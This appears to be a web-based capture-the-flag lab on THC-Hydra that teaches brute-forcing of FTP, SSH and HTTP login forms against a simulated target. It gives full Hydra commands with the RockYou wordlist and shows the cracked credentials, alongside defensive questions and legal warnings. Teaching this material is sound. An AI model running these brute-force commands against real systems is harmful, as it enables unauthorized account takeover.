// hydra password cracking lab

Brute Force with
THC-Hydra

Use Hydra to crack credentials across three simulated services — FTP, SSH, and HTTP. Collect 10 flags through post-authentication enumeration.

10
Flags
100
Points
3
Services
FTP·SSH·HTTP
Targets
ℹ No Kali Linux Required
No Kali Linux installation is required to complete this lab and collect all 10 flags. The interactive shell simulator runs entirely in your browser on any device. The Hydra commands shown in each task are for conceptual learning — you will practice running them in a live environment in a future lab.
🎯
Simulated Lab Target
10.10.10.75
⚠ This is a SIMULATED target — use the interactive terminal below. Do not attack real systems.
BACKGROUND
What is THC-Hydra?
THC-Hydra is one of the most widely used password brute-forcing tools in penetration testing. It supports over 50 protocols including FTP, SSH, HTTP, SMB, and databases. Hydra works by systematically trying username and password combinations from a wordlist until it finds valid credentials. It is included by default in Kali Linux and is covered in CompTIA PenTest+, CEH, and OSCP certifications.
⚠ Legal Warning
Running Hydra against any system without explicit written authorization is illegal under the Computer Fraud and Abuse Act (CFAA) and similar laws worldwide. Always obtain written permission before conducting any brute-force testing.
TASKS
Step-by-Step Instructions
📁
Task 1 — Brute Force FTP Credentials
Use Hydra to crack the FTP login on port 21 — Flags 1, 2, 3
F01 F02 F03
Step 1 — Understand the Hydra FTP syntax
Hydra's basic syntax is: hydra -l [user] -P [wordlist] [target] [protocol]. The -l flag specifies a single username. The -P flag specifies a password wordlist file. RockYou is the most common wordlist on Kali Linux.
kali — hydra ftp
# Brute force FTP with a known username
┌──(kali㉿kali)-[~]
└─$ hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.75

Hydra v9.4 (c) 2022 by van Hauser/THC
[DATA] attacking ftp://10.10.10.75:21/
[21][ftp] host: 10.10.10.75 login: ftpuser password: sunshine
[STATUS] attack finished for 10.10.10.75 (valid pair found)
Step 2 — Use the simulator to explore after cracking
✓ Credentials cracked — ftpuser:sunshine. Now use the Interactive Simulator below. Select the FTP Shell tab and explore the filesystem to find Flags 1, 2, and 3.
Analysis Questions
Q1. What does the -l flag do in Hydra? How is it different from the -L flag?
Q2. What is the RockYou wordlist and why is it commonly used in password cracking?
🔐
Task 2 — Brute Force SSH Credentials
Use Hydra to crack the SSH login on port 22 — Flags 4, 5, 6
F04 F05 F06
Step 1 — Hydra SSH syntax
SSH brute-forcing works similarly to FTP. Add -t 4 to limit threads — SSH servers often block aggressive connections. The -v flag shows verbose output so you can see each attempt.
kali — hydra ssh
# SSH brute force — limit to 4 threads to avoid lockout
└─$ hydra -l sysadmin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.75 -t 4

[DATA] attacking ssh://10.10.10.75:22/
[ATTEMPT] target 10.10.10.75 - login "sysadmin" - pass "dragon"
[ATTEMPT] target 10.10.10.75 - login "sysadmin" - pass "master"
[22][ssh] host: 10.10.10.75 login: sysadmin password: master
[STATUS] attack finished for 10.10.10.75 (valid pair found)
Step 2 — Use the simulator
✓ Credentials cracked — sysadmin:master. Select the SSH Shell tab in the simulator and enumerate the system to find Flags 4, 5, and 6.
Analysis Questions
Q3. Why is it important to limit threads with -t 4 when brute-forcing SSH? What could happen with too many threads?
Q4. What defensive measures can a sysadmin implement to prevent SSH brute-force attacks? List at least three.
🌐
Task 3 — Brute Force HTTP Login Form
Use Hydra to crack a web application login — Flags 7, 8, 9, 10
F07 F08 F09 F10
Step 1 — HTTP POST form brute force syntax
HTTP form brute-forcing requires the http-post-form module. You must specify the form path, POST parameters, and a failure string — the text that appears when a login fails. Hydra watches for the absence of this string to detect a successful login.
kali — hydra http
# HTTP POST form brute force
# Format: "path:params:failure_string"
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

[DATA] attacking http-post-form://10.10.10.75/login
[80][http-post-form] host: 10.10.10.75 login: admin password: letmein
[STATUS] attack finished for 10.10.10.75 (valid pair found)
Step 2 — Use the simulator
✓ Credentials cracked — admin:letmein. Select the HTTP Shell tab in the simulator and explore the admin panel to find Flags 7, 8, 9, and 10.
Analysis Questions
Q5. What is the failure string in the HTTP POST form module and why is it critical to get it right?
Q6. What is a CAPTCHA and how does it defend against HTTP brute-force attacks like the one Hydra performs?
SIMULATOR
Post-Authentication Shell Simulator
Select a service tab to switch between the three cracked environments. Each has its own filesystem with hidden flags. Type help to see available commands.
ftpuser@target — ftp session
AUTHENTICATED
ftp>
Hint: Try ls · ls -la · cd · cat · pwd · whoami · env · find · help
Final Analysis Questions
Q7. Compare the three Hydra commands used in this lab. What is different about the HTTP form brute force compared to FTP and SSH?
Q8. What password policy would have prevented all three successful cracks in this lab? Be specific about length, complexity, and lockout requirements.

READY TO SUBMIT?

Head to the flag submission page to enter your collected flags,
track your score, and claim your completion badge.

🚩 SUBMIT FLAGS →
Hydra Password Cracking Lab  ·  Authorized use only  ·  © 2026
Created and hosted by Professor Salazar (2026)